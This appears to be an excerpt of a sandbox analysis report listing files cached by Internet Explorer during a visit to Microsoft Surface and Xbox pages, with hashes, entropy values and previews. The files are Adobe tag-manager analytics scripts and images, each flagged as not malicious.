                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC757e0fad0c5148689679137d9cb145db-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC757e0fad0c5148689679137d9cb145db-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC757e0fad0c5148689679137d9cb145db-source.min.js', "null==window.wdgtagging&&(window.wdgtagging=function(){var n={},b={};return n.data={},n.tagsInfoList=[],n.tagsExecuted=[],n.debugLogToConsole=!1,n.debugLogMsgs=[],n.storageSupport=!1,n.wcpConsentResult={},n.wcpConsentCheckDone=!1,n.wcpConsentChecking=!1,n.wcpCheck=0,b.util={},n.qWcpConsentCallback=[],n.checkTagType=function(e,t){return e!=undefined&&null!=e&&t!=undefined&&null!=t&&(b.util.isjQueryLoaded()?jQuery(e).is(t):e.tagName==t.toUpperCase())},n.initializeWcp=function(){b.util.consentRequired()?n.wcpConsentResult={Required:!0,Analytics:!1,SocialMedia:!1,Advertising:!1}:(n.wcpConsentResult={Required:!0,Analytics:!0,SocialMedia:!0,Advertising:!0},n.wcpConsentCheckDone=!0)},n.doWcpLoopTimeout=
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC85090800e35a4f16b37f030c2c2ca1b4-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3488
                                                                                                                                                                                                              Entropy (8bit):5.267439114949007
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Dct/BudjcRsTrHDxpkVorX6p/Ub2/k/UbjjNb6aU6RPwIjI9BAEcZTrKg1RoEX6j:4BBaXXlX6pcKh6aHPCTeX6pcKqs0g
                                                                                                                                                                                                              MD5:0218C4CE41C8DF83D268FF5B8B12A54A
                                                                                                                                                                                                              SHA1:4AE0E92C9B1CD377B52D68AFD8F65BD426BBBD31
                                                                                                                                                                                                              SHA-256:52E882E234B53AA33C8A8C5ADF4467297B845E6779335EA21FE4B491DDC85090
                                                                                                                                                                                                              SHA-512:F5EBAC96AFDA59CC74AE59FCF8A8D9BEB91BC15DB5F6C7E72C5C9C6403D944D0C48B0680FC98FEFF4D37E621301A7FFD015FBCA9F3E23B60738A25656ED45BBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC85090800e35a4f16b37f030c2c2ca1b4-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC85090800e35a4f16b37f030c2c2ca1b4-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC85090800e35a4f16b37f030c2c2ca1b4-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(t,r,e){0<e(\"#primaryArea[data-m]\").length?(e(document).on(\"mousedown\",\"#WF-Modal a[href], #WF-Modal button, .wf-option\",function(){try{var t=e(this);t.is(\"a, button\")||(t=t.closest(\".wf-option\").find(\"input[type='radio']\"));var a=t.parents(\"#WF-Modal\"),o=t.parents(\"#WF-Modal-1\");r.checkFixDataM(t),r.checkFixDataM(o),r.checkFixDataM(a);var i=JSON.parse(t.attr(\"data-m\")),n=JSON.parse(a.attr(\"data-m\")),d=JSON.parse(o.attr(\"data-m\"));i.aN=\"body\",t.is(\"button\")&&t.hasClass(\"glyph-cancel\")?i.id=\"WF-Modal-close-icon\":t.parents(\".wf-option\")&&1<=t.parents(\".wf-option\").length?(i.id=t.hasClass(\"wf-close\")?\
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCb0e7b7b9bdd945458fd1380859b0de3b-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):811
                                                                                                                                                                                                              Entropy (8bit):5.447642211432647
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DbsnGLct/BubsnGpUeX5FYkY5vrXDNloCV0ovwHn/:DcNt/Buc4rSnc6v8
                                                                                                                                                                                                              MD5:7835F56ED59C12CB1F279914D9B86A7D
                                                                                                                                                                                                              SHA1:70156FEFCD58E75B064C22E0DC5B26EC836766DA
                                                                                                                                                                                                              SHA-256:B2E828BB9F81150D7DCD0D8BEA87F2A7A32BAF5B08793E21AF8AF4C97CD4DD93
                                                                                                                                                                                                              SHA-512:EF15636A2A88E556128B46339BA567AF0A6AE4C76CEFDEEAAAFB19EB73892821F194B307B7F96FC817A7947F53DD809294F9CA299AA9E5064DF4FC097AD6D963
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb0e7b7b9bdd945458fd1380859b0de3b-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb0e7b7b9bdd945458fd1380859b0de3b-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb0e7b7b9bdd945458fd1380859b0de3b-source.min.js', "null!=window.wdgtagging&&function(a,t){var n=function(){\"buy\"===a.getData(\"gpn\")&&\"us\"===a.getData(\"loc\")&&(t(\"#buy-walmart-button-buyonline\").on(\"mousedown\",function(){var t=\"//beacon.walmart.com/vm/ttap.gif?id=10695169&site=Surface_WhereToBuy_BuyOnlineBtn\";a.util.requestImage(t),a.addTagExecuted(\"iSpot\",\"Conversion\")}),a.addTagInfo(\"iSpot\",\"2018june11-v1\"))};a.category_all_status||a.category.advertising.status?n():a.category.advertising.queue.push(n)}(window.wdgtagging,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCbec9fb5900f143a48e5bf0e0125c6039-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):747
                                                                                                                                                                                                              Entropy (8bit):5.383611399696555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCGHk1ct/BefCGHkgLgUTO/1JWb9Cjfd+FVWeg1f0x+BKxgQAhVlVg8zAwuX:Dhk1ct/BuhkXUTO/3Lh+FVWpFpQcDDAJ
                                                                                                                                                                                                              MD5:01AEC6FE4A476FA4C3F9C5543F0F8E6A
                                                                                                                                                                                                              SHA1:D8E5F353C1FD9311B587F877A0383A08E3EF55DE
                                                                                                                                                                                                              SHA-256:86A13CEEA44D153F8F743011BABDB6F4B220769A0F34A6A8C28CF0C4EE264A36
                                                                                                                                                                                                              SHA-512:D38779CDAC59CC60AE1AF879D6305E7F6BC1D522D6EE5C02EC766E98C245831DA714D7FD697E41417F180BFE705F75C8E174A99C66237128EABFD47D9E9B2D91
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCbec9fb5900f143a48e5bf0e0125c6039-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCbec9fb5900f143a48e5bf0e0125c6039-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCbec9fb5900f143a48e5bf0e0125c6039-source.min.js', "null!=window.wdgtagging&&function(t,g){try{var a=function(){if(window.location.pathname.match(/\\/..-..\\/surface\\/?$/gi)){var a=\"https://c.unsplash.com/c.gif?p=4468695\";g.requestImage(a),t.addTagExecuted(\"Unsplash\",\"Conversion\")}};t.category_all_status||t.category.socialmedia.status?a():t.category.socialmedia.queue.push(a)}catch(i){g.debugLog(\"Error setting surface Unsplash\"+i)}}(window.wdgtagging,window.wdgtagging.util,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCc0230152987c4e73b3230be623bd92e6-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):619
                                                                                                                                                                                                              Entropy (8bit):5.314840506138107
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCGwtBdct/BefCGwtBILgU9GXuAwiKolzoAVvwuk32an/:DEzct/BuEhU9GXuAjyMvwuGZn/
                                                                                                                                                                                                              MD5:EAFD58E9C6AEA4A0EDB124DF675E8FA3
                                                                                                                                                                                                              SHA1:4200A7AA18602B2C0FC1BD6510148FFE7F1A30CF
                                                                                                                                                                                                              SHA-256:CB9D726E2311986D0442EC64351D5E3C23B5F3E4A1661B5F7A2DB97E28FC670D
                                                                                                                                                                                                              SHA-512:5626F709BF0974CACBB9A80073F8BD32FD37A1B09A532E2D8346721CC2D829E1F52A44F8DFF7AF4747ADD61FC208DA4FECD03F0D9DA1B3BF28313618C75CE756
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc0230152987c4e73b3230be623bd92e6-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc0230152987c4e73b3230be623bd92e6-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc0230152987c4e73b3230be623bd92e6-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.clicktale&&function(g,a,i){var n=function(){i.init(\"755cc4ab-c4bf-46d8-a608-d3c5d66fabac.js\")};g.category_all_status||g.category.analytics.status?n():g.category.analytics.queue.push(n)}(window.wdgtagging,window.wdgtagging.util,window.wdgtagging.clicktale,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCc603b998e8c64e55b78656817f793285-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3099
                                                                                                                                                                                                              Entropy (8bit):5.259458747529417
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FYBBuU4sGPHC8Df/gdzG9gs2CiIYWq/s9FPsYlD:KB14NvCqfYdimyqEvsk
                                                                                                                                                                                                              MD5:3C7FBBFD0C7664325BEAE53FEF49EA83
                                                                                                                                                                                                              SHA1:B42F22112B59DCCCDF4EB28428BD36A076EBFE11
                                                                                                                                                                                                              SHA-256:8D0DDA71B3435D2B4C66082523D6E77435733C15DEDAF06BC295D04780E09B91
                                                                                                                                                                                                              SHA-512:926D285F6AF43F45D735C2B4477ED63BF9102B1799E18456565EA16C8BAC233EEADB4B808DA8BAAE5B84E31585A49AEDB43463684BE43A57F0572B5083E8F57F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc603b998e8c64e55b78656817f793285-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc603b998e8c64e55b78656817f793285-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCc603b998e8c64e55b78656817f793285-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(d,a,e,i){var n=!1,r=setInterval(function(){var a=i(document).find(\"#csInv\");if(0<a.length&&i(a).is(\":visible\")&&0!=i(a).css(\"opacity\")){clearInterval(r),n=!0;var t={actionType:\"O\",behavior:awa.behavior.SURVEYINITIATE,uri:location.href,pageName:d.getData(\"gpn\"),contentTags:{contentName:\"comscore-survey-overlay\",areaName:\"body\"}};awa.ct.captureContentPageAction(t)}},1e3);setTimeout(function(){n||clearInterval(r)},6e4),0<i(\"#primaryArea[data-m]\").length?(i(document).on(\"mouseover\",\"#csInv\",function(){var a=this;e.checkFixDataM(a);var t=JSON.parse(i(a).attr(\"data-m\"));t.cN=\"comscore-survey-overlay\",t.aN=\"body\"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCc815dd9fd9f24ad29c42bf5e6b5d4ad5-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4086
                                                                                                                                                                                                              Entropy (8bit):5.238217080460685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Dzt/BuGslN6Vv+Fc3vC/y1N3vnrB3njJB8RUIJlGSblXjovr0qn5hjUr+XFssovF:XBBmCC7WljUpIoq2wwoqol0ZxHpHqH6
                                                                                                                                                                                                              MD5:0057F31BD6EEE7A45B1886E6D83B3B9C
                                                                                                                                                                                                              SHA1:352C5835AA644D99A7A91B142DAE1F1332CF5B7D
                                                                                                                                                                                                              SHA-256:875534DA6F1E27F3E65F76C9BCD3BCFF955439C120E23DC61072C832827A9E89
                                                                                                                                                                                                              SHA-512:C7908B90681FABB3B1CB9162BE265896C18F3F5CFABB18823F34B2991C87CE55B00585A7426AFC4BA18E793323EEBC20C8AAF6D71DAEEC639515889D27666C0B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc815dd9fd9f24ad29c42bf5e6b5d4ad5-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc815dd9fd9f24ad29c42bf5e6b5d4ad5-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc815dd9fd9f24ad29c42bf5e6b5d4ad5-source.min.js', "if(null!=window.wdgtagging){var wlp=window.location.pathname;wlp.match(/\\/jumpin\\/games\\/(crackdown-3|metro-exodus|devil-may-cry-5|kingdom-hearts-3|division-2)\\/?/gi)&&function(t,a,o,n){var e=0;n(document).on(\"mousedown touchstart\",\"#little-hand-container\",function(){if(!n(this).attr(\"data-gm-stpr\")){n(this).attr(\"data-gm-stpr\",\"true\");var t=n(this).find(\"img\").attr(\"alt\")||\"Swipe Left or Right to Navigate\";n(this).attr(\"data-bi-name\",t);var a={behavior:awa.behavior.STARTPROCESS,uri:location.href,contentTags:{scn:\"H2-Campaign\",field3:t}};awa.ct.capturePageAction(this,a),i(),d()}}),n(document).on(\"mousedown touchend\",\".ms-draggable-area .ms-draggable-hotspot:not([data-wd
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCd25bab6c8b364b96acb2ffc6f1860d60-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6363
                                                                                                                                                                                                              Entropy (8bit):5.342220399139114
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WB6XDCoj42oYrzU9Tn5+8ENcgcmjJEjekTE:W0dXhrzU9d+8ENcgcCEjekTE
                                                                                                                                                                                                              MD5:DB5B558B4363E08CC95C4A503F7A3B64
                                                                                                                                                                                                              SHA1:73B82F504DFDBE0679D33C7D653BC66FE4F9EFEF
                                                                                                                                                                                                              SHA-256:93293208DBC07E8FB03A1FC7EB77610162DAF3CC92F02BE551C4520C817C580C
                                                                                                                                                                                                              SHA-512:E6352A8C198D920B18D4ED12C1757C72B9F2BA9D097D29A608467A966A047D1E287358741B45EF80EAD2B8F933815523C775BA2D49AFD08604EBF7580F45116F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd25bab6c8b364b96acb2ffc6f1860d60-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd25bab6c8b364b96acb2ffc6f1860d60-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd25bab6c8b364b96acb2ffc6f1860d60-source.min.js', "location.pathname.match(/\\/surface\\/devices\\/help-me-choose\\/?/gi)&&null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&(window.wdgtagging.data=window.wdgtagging.data||{},function(t,e,a,i,w){jQuery(\"META[name='awa-pageType']\").length<1&&i.setMetaTag(\"awa-pageType\",\"HMC-page\"),(a=a||{}).sdata=a.sdata||{};var C=a.sdata;C.pageName=t.getData(\"gpn\"),C.scnName=\"hmc\",C.started=!1,C.qOrder=C.qOrder||{divQuestionFirst:\"1\",divQuestion2:\"2\",divQuestion3:\"3\",divQuestion4:\"4\",divQuestion5:\"5\",divQuestion6:\"6\",divQuestion7:\"7\"},C.questions={};var N=C.questions;w(\".questions-panel .surface-hmc-qa-block-item\").each(function(){var t=\"q\"+C.qOrder[w(this).attr(\"id\")];N[t]=\"\"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCda45a7b334404453b41265259d1cd0b3-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):12779
                                                                                                                                                                                                              Entropy (8bit):5.299740248840714
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:hBh5bMwWSMjlpngYrZfTZ+eel0fq3fCZjlhDmjlBfcUhjlOQ4:haBSMjlpgYrZLZel0SyjlhDmjlBfljlu
                                                                                                                                                                                                              MD5:7F91086C3BB218AC372EB21A985623FD
                                                                                                                                                                                                              SHA1:3F798093F9AF4B1786314DCB4181C629C02404F9
                                                                                                                                                                                                              SHA-256:756FD27D457E3F1C8D7B73A5B9AF1C5CA8E2F9ABEDDA9B27F3EAB6E74D85C84A
                                                                                                                                                                                                              SHA-512:F68B87610EA20431C19255F5E29A411F1722504E797F1F688423AF93C292FDA7F06B8021450B73EA873EEA98BA6E976DC490983EA8A049FA70E9911943443D68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCda45a7b334404453b41265259d1cd0b3-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCda45a7b334404453b41265259d1cd0b3-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCda45a7b334404453b41265259d1cd0b3-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(t,a,d,s){var n,l,c,r,m,i=location.pathname,e={main_sel:\"#BodyContent>DIV\",zone_id:\"a3\",sec_custom_sel:\"[data-sec],[id*='ContentBlockList_'].drawer,[id*='TopContentBlockList_'],.e49-wrapper,.bottomBGImage\",grp_custom_sel:\".m-hero,.mosaic-container,.m-hero-item,[id^='ContentBlockList_'],[data-grid='container'],.gameSection,.featuredgames,[id^='ContentBlockList_'] > div,.c-drawer > [data-grid='container'],.c-drawer,.custom-e49-nav,.m-multi-hero\",pnl_custom_sel:\".m-global-promotion,.m-product-placement-item,.m-panes-product-placement-item,section.f-stacked,.m-product-placement,.c-drawer-toggle,.c-drawer > [d
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RCea5ad6baf7a84455b0447fa19709190d-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1014
                                                                                                                                                                                                              Entropy (8bit):5.560017865274274
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:D9ct/BuPU9AuXnV/D9fnIVI+NOvi3rRIpehvGnfMvwuAwn/:Dyt/BuPyeOvi3nhvGnfMvX
                                                                                                                                                                                                              MD5:E68BCB1133DF52884A4AA5EF605F9FED
                                                                                                                                                                                                              SHA1:8841E34E044FECAAA5B09A0610B292C33939297C
                                                                                                                                                                                                              SHA-256:74B63BFCB26351A57D7E73720043BD3162E9BDE72E6DB85614A4BA0A1BE064E1
                                                                                                                                                                                                              SHA-512:7D8FAC27D45448E90BEE9A77A8CA9C1C3D95966BC30E54232F64BE81C89ADF1B92B9AB9B6818906B2FE4F86B3A666934D5C2DBC08A30E690B26E22A13574F016
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea5ad6baf7a84455b0447fa19709190d-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea5ad6baf7a84455b0447fa19709190d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea5ad6baf7a84455b0447fa19709190d-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.bing&&function(t,o,g){var n=function(){var n=[\"homepage\",\"devices/surface 3\",\"devices/surface pro 4\",\"devices/surface book\"],e=[\"en-us\",\"en-gb\",\"en-au\"],i=t.getData(\"langLoc\"),a=t.getData(\"gpn\");i.match(/US|DE|FR|IT|NL|CH|ES|CA|JP|NZ|GB|AU/i)?(o.init(\"4000034\"),a.match(/devices\\/surface (laptop|pro|pro 4)\\/overview/i)&&g(\"a[productbuyxmlid]\").on(\"mousedown\",function(){window.uetq=window.uetq||[],window.uetq.push({ea:\"BuyNowUET\"})})):-1<e.indexOf(i)&&-1<n.indexOf(a)&&o.init(\"4000034\")};t.category_all_status||t.category.analytics.status?n():t.category.analytics.queue.push(n)}(window.wdgtagging,window.wdgtagging.bing,wind
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE1Mu3b[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4054
                                                                                                                                                                                                              Entropy (8bit):7.797012573497454
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                                                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                                                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                                                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                                                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                                                                                                                              Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4DYKe[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 1920x500, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):60541
                                                                                                                                                                                                              Entropy (8bit):7.965245354115093
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:mAARflsvYKR+6Rp8+VtMl0gaxBMlaTRGKSES3xR/f6NR/:mASfuvY6Rp8+VnvIpj/iT/
                                                                                                                                                                                                              MD5:07E0E18A8279539E30674DDF0816EAFF
                                                                                                                                                                                                              SHA1:1F648DB8ECAA6514F83F51E3463E5DFF54972055
                                                                                                                                                                                                              SHA-256:310297F190851B86820E0D9C4607AF6A1832AFFF149464B0AD125C9EA0D1FB09
                                                                                                                                                                                                              SHA-512:7D75C2BB0FF46FDDFFBB1CEFF369F7E88C26F313BB1A229BAA8BD33E09EDF110E9F968EC5F6D21F0070ECECEE2D0B1207D8CB5DA9612213684301E965FD887B9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DYKe?ver=f845&q=90&m=8&h=500&w=1920&b=%23FFFFFFFF&l=f&x=0&y=0&s=3840&d=1000&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T..........."..................................................n.)..m....AN....m..h.......j.H`..m.`..b`.....0h..............$J..1F/.........d.jz...h.....?........t.QM.c.K.....l......L.m....m0..1...u#.`......e....S........!%1...:...7.o..i...y.GG....o_s....`..t.n...J..*.cuN.....6.l.b....C..4.@&.....1e..6..`......m...2........@.f1F<x.t.q._..._.y=.v.s...'.oj.k...l<~r....+.S....e07.:@P.m.......M.i...7%6.T...c...CL....A@..........&..!!.1....[OK^i..;.o...e.+SS................~c.....[Am.I.St....CT..`...C.`.6.cNj.......l..`...Lbbl.5I...%C......$)S8..........y<_.>~....wG7{{N..*....b...tr...,l...t..2...cJ......Lj...r.C.V46...1.............0...........!L..X..,.:Z...O/..O.O.x.....}......-._kOH.m.C..6;.le6..[.&......R....`.K.aH(T...M..P1...E10.L.li..41.......$.c.x..}M.=q.ucm..?.~...?..,]..GW...mdy...zu........[..P:...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4E4rR[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6154
                                                                                                                                                                                                              Entropy (8bit):7.890251380195494
                                                                                                                                                                                                              Encrypted:false
